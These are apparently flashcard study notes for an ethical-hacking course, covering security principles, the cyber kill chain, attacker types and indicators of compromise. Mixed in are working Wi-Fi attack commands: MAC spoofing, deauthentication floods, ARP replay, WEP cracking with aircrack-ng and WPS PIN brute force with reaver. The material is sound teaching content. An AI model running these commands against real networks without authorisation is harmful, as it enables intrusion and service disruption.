Module 1 - Introduciton to Ethical Hacking
Elements of Information Security (EIS)
(Confidentiality -> Integrity - > Availability) -> Authenticity -> Non-repudiation
3. Close-in Attacks (Classification of Attacks)
-Performed when the attacker is in close physical proximity with the target system or network in order to gather, modify, or DISRUPT ACCESS to information -Examples include social engineering such as eavesdropping, shoulder surfing, and dumpster diving
ARP Request Replay
Wait for an ARP packet Capture it, replay it (transmit it) This causes the AP to produce another packet with a new IV Keep doing this till we have enough IVs to crack the key
Confidentiality (EIS)
Assurance tha the information is accessible only to those AUTHORIZED TO HAVE ACCESS
1. Passive Attacks (Classification of Attacks)
- Do not tamper with the data and involve intercepting and MONITORING NETWORK TRAFFICE and data flow on the target network -Examples include sniffing and eavesdropping
2. Active Attacks (Classification of Attacks)
- Tamper with data in transit or DISRUPT THE COMMUNICATION or services between the systems to bypass or break into secured systems -Examples include DoS, Man in the Middle, session hijacking, and SQL injection
5. Distribution Attacks
-Attackers tamper with hardware or software prior to installation -Attackers tamper with hardware or software at its source or in transit
4. Insider Attacks (Classification of Attacks)
-Using privileged access to VIOLATE RULES or intentionally cause a threat to the organization's information or information systems -Examples include theft of physical devices and planting keyloggers, backdoors, and malware
Problem with WEP
IV sent to router via plaintext 24 bits is not big enough and IVs will start to repeat itself. Statistical attacks based off these repeats is possible so using aircrack-ng would be a tool
Defensive Information Warfare (PREPDAD)
Refers to all strategies adn actions designed to defend against attacks on ICT assets Prevention, Deterrence, Alerts, Detection, Emergency Preparedness, and Response
Techniques (TTPs)
TECHNICAL METHODS USED BY AN ATTACKER to achieve intermediate results during the attack. They include initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, covering the tracks of data exfiltration, and others
1. Reconnaisance (CKC)
Gather data on the target to probe for weak points
5. Installation (CKC)
Install malware on the target system
ifconfig: ether
MAC address of the virtual interface
WPA vs WPA2
Nearly the same but both use different encryption methods WPA uses TKIP and the other uses CCMP
Hacking Phase 1: Reconnaissance
Prep phase that gathers information about a target prior to launching an attack More about the target is known on a broad scale Target range may be organization's clients, employees, operations, network, and systems
define PRGA
Pseudo Random Generation Algorithm refers to an algorithm that uses mathematical formulas to produce sequences of random numbers
Cyber Kill Chain (CKC) (7 Steps) WACRIDE
Reconnaissance -> Weaponization -> Delivery -> Exploitation -> Installation -> Command and Control -> Actions on Objectives
Offensive Information Warfare (SWWMM)
Refers to information warfare that invovles attacks against the ICT assets of an opponent Web application attacks, web server attacks, malware attacks, MITM attacks, system hacking
Authenticity (EIS)
Refers to teh characteristic of a communication, document, or any data that ensures the QUALITY OF BEING GENUINE Digital signatures fall in this category.
Launch packet sniffing
1. Change NIC to monitor mode 2. airodump-ng wlan0 (or name of wifi card listed on iwconfig) Columns explained ESSID - name of network BSSID - MAC of target network PWR - Signal strength or power network higher number is the more powerful Beacons - Sends a frame to broadcast existence #Data - Number of data packets sent out #/s - Number of data packets collected in past 10 seconds CH - channel working on MB - Max speed supported on network ENC - Encryption used by network (OPN means open) CIPHER - Method used by encryption AUTH - authentication used PSK is a preshared key 3. airodump-ng --band abg wlan0 (a is 5G and bg is 2.4)
Information Assurance Processes
1. Developing local policy, process, and guidance 2. Designing network and user authentication strategies 3. Identifying network vulnerabilities and threats 4. Identifying problem and resource requirements 5. Creating plans for identified resource requirements 6. Applying appropriate information assurance controls 7. Performing certification and accreditation 8. Providing information assurance training
Categories of Indicators of Compromise
1. Email Indicators 2. Network Indicators 3. Host-Based Indicators 4. Behavioral Indicators
Why change MAC addresses
1. Increase anonymity 2. Impersonate other devices 3. Bypass filters and connect to specific devices that only specific MACs have access to
Change MAC address linux cmds
1. ifconfig wlan0 down 2. ifconfig wlan0 hw ether 00:11:22:33:44:55 3. ifconfig wlan0 up 4. ifconfig These save to memory, so once you restart your computer, it will revert back to the original MAC
macchanger
1. ifconfig wlan0 down 2. macchanger -r wlan0 3. ifconfig wlan up
handshake packets
4 packets transferred between a client and a router handshake does not contain data to recover key; just data to check if key is valid or not 1. Monitor the target network 2. deauth someone
Non-Repudiation
A GUARANTEE that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message
Information Warfare
Use of information and communication technologies (ICT) to gain competitive advantages over an opponent
Ethical Hackers will try to answer the following questions
What can an intruder see on the target system (Recon and scanning) What can an intruder do with the that information (Gaining and maintaining access) Does anyone at the target organization's notice the intruder's attempts or successes (Recon and covering tracks) Are all components of the information system adequately protected, updated and patched How much time, effort and money are required to obtain adequate protection Are the information security measures in compliance with legal and industry standards Black hat hackers will avoid being noticed via proxies and anonymizers
Gray Hats
Work both offensively and defensively at various times
Scan wps networks
wash --interface wlan0
How do hackers hack?
They try various tools and attack techniques to EXPLOIT VULNERABILITIES in a computer system or its security policy and controls in order to fulfill their motives
Cyber Kill Chain Methodology
Component of intelligence-driven defense for the identification and PREVENTION of MALICIOUS INTRUSION ACTIVITIES
What is hacking
Conduct footprintring/recon, creating a map of the infrastructure, identifying technologies in use, identifying potential exploits and attack vectors Exploiting system vulnerabilities and compromising security controls to gain unauthorized access to system Modifying system or application features to achieve a goal outside of the creator's original purpose Steal or redistribute intellectual property, leading to business loss
Korek Chop Chop Attack
Cracking WEP Works with weak signals Determine packet key stream Forge new packet Inject it into the traffic
6. Command and Control (CKC)
Create a command and control channel to communication and pass data back and forth
2. Weaponization (CKC)
Create a deliverable malicious payload using an exploit and a backdoor
Reaver
Guesses pin on WPS ports reaver --bssid() --channel 1 --interface wlan0 -vvv --no-associate vvv reveals as much info as possible no associate prevents reaver from making associations because their associations are buggy use your own fakeauth Execute reaver first, then fake auth
Tactics (TTP)
Guidelines that describe the way an attacker performs the attack from the beginning to the end. Consists of the various tactics for information gathering to perform initial exploitation, privilege escalation, and lateral movement, and to deploy measures for persistent access to the system and other purposes
Hacking Phase 4: Maintaining Access
Hacker retains ownership of the system Attackers will prevent the system from being owned by other attackers by securing their exclusive access with backdoors, rootkits, or trojans Attackers can upload, download, or manipulate data, application, and configurations on the owned system Attackers use the compromised system to launch further attacks
Hacking Phase 5: Clearing Tracks
Hiding malicious acts Intentions include obtaining continuing access to the victim's system, remaining unnoticed and uncaught, and deleting evidence that might lead to their prosecution Attacker overwrites the server, system, and application logs to avoid suspicion Attackers always cover their track to hide their identity
Limitations of EH
If business knows what to look for and why they are hiring an EH, there is little to gain EH can only help organization better understand its security system, but it is up to organization to place the right safeguards on the network
Technical Skills of EH
In-depth knowledge of major operating environments ie windows, unix, linux, and macs Knowledge of networking concepts, technologies, and related hardware and software Computer expert adept at techincal domains Knowledge about security areas and related issues High technical knowledge for launching sophisticated attacks
List of Adversary Behaviors
Internal Reconnaissance Use of powershell Unspecified proxy activities Use of commond line interface Http user agent Command and control server Use of DNS tunneling Use of web shell Data staging
Adversary Behavioral Identification
Involves the IDENTIFICATION OF COMMON METHODS or techniques followed by an adversary to launch attacks on or to penetrate an organization's network. Gives security professional insights into upcoming threats and exploits
Information Assurance
Making sure integrity, availibility, confidentiality, and authenticity of information and information systejms are protected during the usage, processing, storage, and transmission of information
MAC Address
Media Access control address that is permanent, physical and unique assigned to network interfaces by the manufacturer. No two network devices have the same MAC address. IP is used to identify devices over the internet. The MAC address is used to identify devices within a network
Cyber terrorists
Motivated by religious or political beliefs to create fear through the large-scale disruption of computer networks
Attacks
Motive(Goal) + Method + Vulnerability
Tactics, Techniques, and Procedures (TTPs)
PATTERNS OF ACTIVITIES AND METHODS associated with specific threat actors or groups of threat actors
7. Actions on Objectives (CKC)
Perform actions to achieve intedned objectives/goals
Ethical Hacking
Permission and intent Use of hacking tools, tricks, and techinques to identify vulnerabilities and ensure system security Focuses on simulating the techniques used by attacked to verify the existence of exploitable vulnerabilities in a system's security Perform security assessments for an organization with the permission of concerned authorities
Hacking Phase 3: Gaining Access
Point where the attacker obtains access to the operating system or applicaitons on the target computer or network Access can be gained at operating system, application, or network levels Attacker can escalate privileges to obtain complete control of the system. In this process, the attacker's intermediate systems are compromised as well Examples are password cracking, buffer overflows, DOS, and session hijacking
Hacking Phase 2: Scanning
Pre attack where attacker scans the network for specific information based on information gathered during the recon Use of dialers, port scanners, network mappers, ping tools, and vulnerability scanner Extract information such as live machines, port, port status, OS details, device type, and system uptime to launch attack
Reasons why organizations recruit ethical hackers
Prevent hackers from gaining access Uncover vulnerabilities in systems and explore security risk potential Strengthen an organization's security posture - policies, network protection infrastructure, and end-user practices Avoid security breaches Safeguard customer data Enhance security awareness at all levels
Procedures (TTPs)
Procedures are organizational approaches that threat actors follow to launch an attack. The number of actions usually differs depending on the objectives of the procedure and the threat actor group
Hacktivists
Promote a political agneda by hacking, especially by defacing or disabling websites
Cyber Kill Chain Insights
Provides insights into attack phases, which helps security professionals to understand the adversary's tactics, techniques, and procedures beforehand
3. Delivery (CKC)
Send weaponized bundle to the victim using email, USB, Etc.
What MAC info does a packet contain
Source MAC Destination MAC
Motive
The TARGET SYSTEM STORES OR PROCESSES something valuable, and this leads to the threat of an attack on the system
Integrity (EIS)
The TRUSTWORTHINESS OF DATA OR RESOURCES in terms of preventing improper or unauthorized changes. Hashing algorithms fall in this category
Passive Recon
Acquiring information without directly interacting with the target - searching public records or news releases Youre not detectable
ARP packet
Address Resolution Protocol A communication protocl used for discovering the link layer address or MAC address
Suicide Hackers
Aim to bring down the critical infrastructure for a "cause" and are not worried about facing jail terms
Why is Ethical Hacking Necessary
Allows for counter attacks against malicious hackers by anticipating the methods to break into a system
Availibility (EIS)
Assurance that the systems responsible for delivering, storing, and processing information are accessible when REQUIRED BY THE AUTHORIZED USERS
Script Kiddies
Unskilled hacker who compromises a system by running scripts, tools and software that were developed by real hackers
White Hats
Use skills for defensive purposes and are also known as security analysts. They have permission from system owner
4. Behavioral Indicators
Used to identify specific behavior related to malicious activities and include a document executing a Powershell script and remote command execution.
1 . Email Indicators (IOC)
Used to send malicious data to the target organization or individual such as senders email address, email subject, and attachments or links
2. Network Indicators (IOC)
Useful for command and control, malware delivery, identifying the operating system, and other tasks and include URLs, domain names, and IP addresses
Creating a wordlist
crunch [min] [max] [characters] -t[pattern] -o [Filename] Example: crunch 6 8 123abc$ -o wordlist -t a@@@@b
Steps to change to monitor mode
iwconfig (to check mode) ifconfig wlan0 down airmon-ng check kill (will kill process that connects to internet, but thats ok, internet not needed for preconn attacks) iwconfig wlan0 mode monitor ifconfig wlan0 up
Arpreplay Attack command
airplay-ng --arpreplay -b CC:40:D0:C5:38:93 -h 1E:4D:40:4F:CD:83 (thats your wireless adapter) wlan0
Information Security
A state of well-being of information and infrastructure in which the possibility of THEFT, TAMPERING and DISRUPTION OF INFORMATION AND SERVICES is low or tolerable
Non-technical Skills of EH
Ability to learn and adopt new tech quickly Strong work ethics and good problem solving and communication skills Committed to the organization's security policies An awareness of the local standards and laws
Indicators of Compromise
CLUES, ARTIFACTS and PIECES of FORENSIC DATA found on the network or operating system of an orgniazation that dictates intrusion or malicious activity on organizations infrastructure. IOCs are not intelligence by act as good source of information regarding the threats that serve as data points in the intelligence process Security Professionals need to PERFORM CONTINUOUS monitoring of IoCs to effectively and efficiently detect and respond to evolving cyber threats
Capturing packets within range
Can be done even if your MAC isnt the destination MAC. To do this, we change the operation of wireless interface to monitor mode. Default mode is managed which means it will only capture packets whose Destination MAC matches its own
Built in wireless cards drawbacks
Cannot support monitor mode nor packet injections
WEP Cracking
Capture a large number of packets/IVS (airodump-ng) Analyze the captured IVs and crack the key (aircrack-ng) Command: aircrack-ng file.cap Result: It will reveal key
Active Recon
Directly interacting with the target by any means Youre detectable
State-Sponsored Hackers
Employed by governments to penetrate and gain top-secret information from and do damage to the infromation systems of other governments
ifconfig: eth0
Ethernet interface, used in Kali bc of Natnetwork
Scope of EH
Ethical hacking is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices Used to identify risks and highlight remedial actions. It also reduces ICTcosts by resolving vilnerabilities
4. Exploitation (CKC)
Exploit a vulnerability by executing code on the victim's system
Black Hats
Extraordinary computing skills resorting to malicious and destructive activities - crackers
Packet injection
Forcing the AP to generate IV (packets) so you can collect enough to crack password. You must associate with network first. It means you intend to communicate. This occurs mainly when you dont put in a password
3. Host-Based Indicators (IOC)
Found by performing an analysis of the infected system with the organizational framework and include filenames, file hashes, registry keys, DLLs and mutex
What is WPS
Wi-Fi Protected Setup, a one-touch Wi-Fi security protocol, used by printers to connect with 8 digit pin to connect to network without having to formally log on every time
WEP Encryption
Wired Equivalent Privacy Old encryption using RC4 algorithm Cracked easily, still used in some networks To send a packet, it will make a random initialization vector of 24 bits IV+Key(password) = Key stream Key stream transforms packet from gibberish to readable data
deauth command
aireplay-ng --deauth 100000000 -a (ROUTER MAC) -c (TARGET MAC) wlan0
Command to associate with a network
aireplay-ng --fakeauth 0 -a CC:40:D0:C5:38:93 -h 1E:4D:40:4F:CD:83 (thats your wireless adapter) wlan0 go to ifconfig to get network card mac the 0 means you will do it once
WPS attack
aireplay-ng --fakeauth 30 -a () -h () wlan0 Request association every 30 seconds
Target Packet Sniffing Explained
airodump-ng --bssid 00:11:22:33:44: --channel 2 --write test wlan0 Columns explained: Station - clients connected Lost - Data packets lost Frames - number of packets captured Probe - If they are looking for a wifi
ifconfig: wlan0
Your wireless adapter